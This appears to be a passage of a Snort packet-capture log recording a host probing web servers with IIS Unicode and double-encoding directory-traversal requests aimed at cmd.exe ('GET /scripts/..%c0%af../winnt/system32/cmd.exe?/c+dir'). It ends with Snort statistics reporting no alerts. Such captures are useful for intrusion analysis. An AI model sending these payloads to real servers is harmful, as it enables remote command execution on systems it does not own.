137.189.161.199:2059 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:10038 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAAF1  Ack: 0x66B2AE0C  Win: 0xA9FD  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.344562 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2059 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:10294 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAAF1  Ack: 0x66B2AE0C  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.345865 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2062 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:11318 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA13  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.347340 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2062 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:12086 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA14  Ack: 0x66F3CBDF  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.348182 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2062 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:12854 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372EAA14  Ack: 0x66F3CBDF  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 31 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%1c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.351764 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2062 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:13878 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA75  Ack: 0x66F3CDC1  Win: 0xAA1F  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.351930 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2062 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:14646 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA75  Ack: 0x60E7E9E  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.352856 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2070 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:16438 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EA9FE  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.354862 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2070 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:17462 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EA9FF  Ack: 0x66FB1B2C  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.355639 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2070 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:18998 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372EA9FF  Ack: 0x66FB1B2C  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%2f../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.357811 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2070 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:20790 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA60  Ack: 0x66FB1D0E  Win: 0xAA1F  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.357813 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2070 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:21046 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA60  Ack: 0x66FB1D0E  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.359300 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2074 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:21302 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA3F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.363724 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2074 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:22070 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA40  Ack: 0x67419B86  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.364075 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2074 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:23094 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372EAA40  Ack: 0x67419B86  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 30 25 61 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c0%af../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.367165 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2074 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:24886 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAAA1  Ack: 0x67419D68  Win: 0xAA1F  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.367207 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2074 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:25142 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAAA1  Ack: 0x67419D68  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.368803 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2082 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:27190 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA38  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.370594 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2082 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:28214 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA39  Ack: 0x669A82AC  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.370628 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x97
137.189.161.199:2082 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:28470 IpLen:20 DgmLen:137 DF
***AP*** Seq: 0x372EAA39  Ack: 0x669A82AC  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
63 31 25 39 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79  c1%9c../winnt/sy
73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F  stem32/cmd.exe?/
63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A  c+dir HTTP/1.0..
48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E  Host: www..Connn
65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D  ection: close...
0A                                               .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.372900 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2082 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:29238 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA9A  Ack: 0x669A848E  Win: 0xAA1F  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.373823 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2082 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:29494 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA9A  Ack: 0x669A848E  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.375139 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2085 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:30006 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA41  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.377979 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2085 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:30774 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA42  Ack: 0x665C68BF  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.378490 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x98
137.189.161.199:2085 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:32310 IpLen:20 DgmLen:138 DF
***AP*** Seq: 0x372EAA42  Ack: 0x665C68BF  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74 2F 73  %35%63../winnt/s
79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F  ystem32/cmd.exe?
2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D  /c+dir HTTP/1.0.
0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E  .Host: www..Conn
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
0D 0A                                            ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.380437 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2085 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:32822 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAAA4  Ack: 0x665C6A93  Win: 0xAA2D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.380600 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2085 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:33078 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAAA4  Ack: 0x665C6A93  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.382074 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2090 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:33334 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA2F  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.384042 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2090 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:33590 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA30  Ack: 0x674AB673  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.384067 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:2090 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:33846 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372EAA30  Ack: 0x674AB673  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
25 33 35 63 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  %35c../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.386173 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2090 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:36150 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA90  Ack: 0x674AB847  Win: 0xAA2D  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.386176 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2090 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:36406 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAA90  Ack: 0x674AB847  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.386989 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2093 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:36662 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA41  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.388299 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2093 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:37430 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA42  Ack: 0x669E185C  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.388327 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x9A
137.189.161.199:2093 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:37686 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x372EAA42  Ack: 0x669E185C  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 25 33 35 25 36 33 2E 2E 2F 77 69 6E 6E 74  25%35%63../winnt
2F 73 79 73 74 65 6D 33 32 2F 63 6D 64 2E 65 78  /system32/cmd.ex
65 3F 2F 63 2B 64 69 72 20 48 54 54 50 2F 31 2E  e?/c+dir HTTP/1.
30 0D 0A 48 6F 73 74 3A 20 77 77 77 0D 0A 43 6F  0..Host: www..Co
6E 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65  nnnection: close
0D 0A 0D 0A                                      ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.390759 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2093 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:38966 IpLen:20 DgmLen:40
*****R** Seq: 0x372EAAA6  Ack: 0x372EAAA6  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.390761 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2093 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:38710 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAAA6  Ack: 0x669E185C  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.391578 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2098 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:39990 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAA57  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.393257 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2098 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:43574 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAA58  Ack: 0x66F9075F  Win: 0xAC00  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.393401 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x96
137.189.161.199:2098 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:44086 IpLen:20 DgmLen:136 DF
***AP*** Seq: 0x372EAA58  Ack: 0x66F9075F  Win: 0xAC00  TcpLen: 20
47 45 54 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25  GET /scripts/..%
32 35 32 66 2E 2E 2F 77 69 6E 6E 74 2F 73 79 73  252f../winnt/sys
74 65 6D 33 32 2F 63 6D 64 2E 65 78 65 3F 2F 63  tem32/cmd.exe?/c
2B 64 69 72 20 48 54 54 50 2F 31 2E 30 0D 0A 48  +dir HTTP/1.0..H
6F 73 74 3A 20 77 77 77 0D 0A 43 6F 6E 6E 6E 65  ost: www..Connne
63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 0D 0A  ction: close....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.395672 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2098 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:45878 IpLen:20 DgmLen:40 DF
***A**** Seq: 0x372EAAB8  Ack: 0x66F90942  Win: 0xAA1E  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:28.396165 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2098 -> 137.189.98.205:80 TCP TTL:125 TOS:0x0 ID:46390 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x372EAAB8  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:29.854012 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2476 -> 137.189.98.182:80 TCP TTL:125 TOS:0x0 ID:34874 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EAFDD  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/19-15:28:31.063194 0:E0:4F:61:A8:80 -> 0:0:0:0:0:1 type:0x800 len:0x3C
137.189.161.199:2713 -> 137.189.98.90:80 TCP TTL:125 TOS:0x0 ID:53308 IpLen:20 DgmLen:44 DF
******S* Seq: 0x372EB4C7  Ack: 0x0  Win: 0xAC00  TcpLen: 24
TCP Options (1) => MSS: 1460 

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



===============================================================================

Snort processed 337 packets.
Breakdown by protocol:                Action Stats:

    TCP: 337        (100.000%)         ALERTS: 0         
    UDP: 0          (0.000%)          LOGGED: 0         
   ICMP: 0          (0.000%)          PASSED: 0         
    ARP: 0          (0.000%)
   IPv6: 0          (0.000%)
    IPX: 0          (0.000%)
  OTHER: 0          (0.000%)
===============================================================================
Fragmentation Stats:
Fragmented IP Packets: 0          (0.000%)
   Rebuilt IP Packets: 0         
   Frag elements used: 0         
Discarded(incomplete): 0         
   Discarded(timeout): 0         
===============================================================================

TCP Stream Reassembly Stats:
   TCP Packets Used:      0          (0.000%)
   Reconstructed Packets: 0          (0.000%)
   Streams Reconstructed: 0         
===============================================================================